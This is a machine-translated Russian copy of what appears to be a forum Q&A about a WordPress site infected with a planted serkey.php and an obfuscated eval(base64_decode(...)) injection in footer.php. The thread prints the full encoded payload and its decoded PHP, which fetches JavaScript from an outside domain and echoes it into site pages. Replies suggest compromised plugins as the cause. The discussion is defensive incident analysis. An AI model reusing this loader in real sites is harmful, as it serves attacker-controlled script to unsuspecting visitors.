wordpress — Вредоносная инъекция: serkey.php и eval () в файлах приложения
Мой сервер стал жертвой атаки с использованием кода.
Сегодня утром я обнаружил вредоносный файл serkey.php в корне моего проекта WordPress. Более того, footer.php было eval() впрыснул в него, который выглядел так:
eval(base64_decode(ZXZhbCh...));
Атака совпала с другим разработчиком, загрузившим некоторые старые файлы Drupal на сервер, но это затронуло рассматриваемый сайт WordPress, поэтому я не уверен, связаны ли они.
Вы когда-нибудь подвергались такой атаке? Я особенно заинтересован в том, чтобы выяснить, какие могли быть возможные бэкдоры для такой атаки, чтобы я мог лучше понять эту атаку и устранить дыру в безопасности.
редактировать
Полный eval()«
<?php error_reporting(0); eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUmxSc2FHbFNla1pOVldwR2RtVkdiSFJOVlRsT1VqQmFXVlF4YUZkWFZURnpWMVJDV2xadGFGQlVWV1JQVGxadmVVNVdjRTVOVm04eFYxZDBXazVYVGtoVGJsSnBVa1ZLVEZwV1pEQmtNVVY1V2toT1QwMUZOWFZaVkVKM1V6Rk9SMWRxVmxwaE1EVkRWREZXYzFKR1RuUlBWM1JVVW10dmVsWkVTbkpPUjFKMFVtNVNVMkZyY0dGV01GcExZekZyZVUxSVpHeFNXR2d4VlZkd1QxUlZNWFZSYlRsaFVucEdSMXBITVVka1ZrcHhVbTFHV0ZKWE9IaFdSVnBUVW0xU1ZrNVlRazlUU0VKT1dXeFNSMlF4YkhSaGVrWnFWakEwTVZVeFVtdFNSbTk1WkVWMFZHRXlVbEJaYWtKelVsVXhTRnBHY0U1TlZtOHhWMWQwV2s1WFRraFRibEpwVWtWS1RWVlVTbnBOTVVWNVdraEtWR0V6UWtwV1Z6VkRZVlpaZUZkcVNtRlNiV2hUVjJwR1ExWkdSbFZTYkVKclRXcHNURlZVUm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwaFJWWlhZa1p3VEZaR1dsSmxSa1p6Vm14c1RsWnNjRlZXYTFaUFRUSkZlVlZzYkZSaWF6Vk5WbXRvVDFSR1JYaFNiazVvWWxaS1dsVXlOVTlY.VlRCM1RsaE9ZVkpYVFRGYVJFcFRVa1p2ZVdSR2NFNWlWMUkyVmxaU1IxWXhWWGhWYTFwUVZtdGFXRlZ0Y0hOV1JsWnpWMnhPVjJKR1dubFViRnBYVm0xRmQxZHNRbGRXUlVwb1ZXMTRWMk5IVVhwaFJYaFhVMFUxVFZWVVJrZGpNa1owVld4c1ZHSnJOVnBVVkVFeFl6RndSbGw2Vm10TmJFcEZWMnBLTUZkck1YUmFTSEJXVmtWYVdGWlVSbE5TYXpsWFVteGtVMkZ0ZUVaV2ExSkNUVlpSZUZOc1dsVmlSbHBZVld4a05GUXhWbk5XVkZaWC5Za1p3UlZwRVNqQmhNVWw1WlVSQ1dHSkhUVEZVVm1SVFVrZEdObHBGVW1GTmJsSk1WVEowYTFVeVJraFZhMmhUVmpKU1VsWlVRa3RqVm5CSFlVVjBhazFYWkRWV2JYQlRXVlpaZDAxWVdsUmhNbEpRV1dwQ01GWlhUWGRrUlZKV1ZqTm9lRmRyV205VE1rMTRXak5zVldKck5YQlVWRUV4WXpGTmQxUnNUbWhpVlZwRldWaHdhMUpHYjNsa1JYUllZa2RTVUZscVNrdE9Wa1pZWWtWMFUwMVZjSFpYYTFaclVtMUdWazlVVG1sTlNFSjBWbFpqTkdORmRGVmplV3R3VDNjcEtUcykpOw)); ?>
Решение
Если вы хотите знать, что он делает, вот код,
error_reporting(0);
if(function_exists('curl_init'))
{
$url = "http://javaterm1.pw/java/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
Это включает в себя JavaScript к вашему коду по ссылке в $urlоткройте ссылку и выберите View page source чтобы увидеть JavaScript и попытаться понять, что он делает.
Для этого есть большие возможности, такие как использование вредоносных тем WordPress, использование более старой версии PHP, получение формы ввода от пользователя и непосредственное использование ее для обработки.
Пока вы пытаетесь понять javascript, это может занять некоторое время, так что сделайте, как предложил @Dagon.
Другие решения
Проблема заключается в внедрении кода одним из ваших плагинов.
У меня была такая же проблема, и я обнаружил, что код внедряется, и при анализе кода обнаружил, что это произошло со многими пользователями, даже с некоторыми пользователями, которые запускают свои WordPress в localhost.
Таким образом, единственная возможность внедрения этого кода через плагины. Проверьте все ваши плагины. Все ли плагины, которые вы используете, заслуживают доверия и хороши.
Удалите все подозрительные плагины, которые у вас есть, а также измените все ваши пароли сервера и администратора по соображениям безопасности.
detector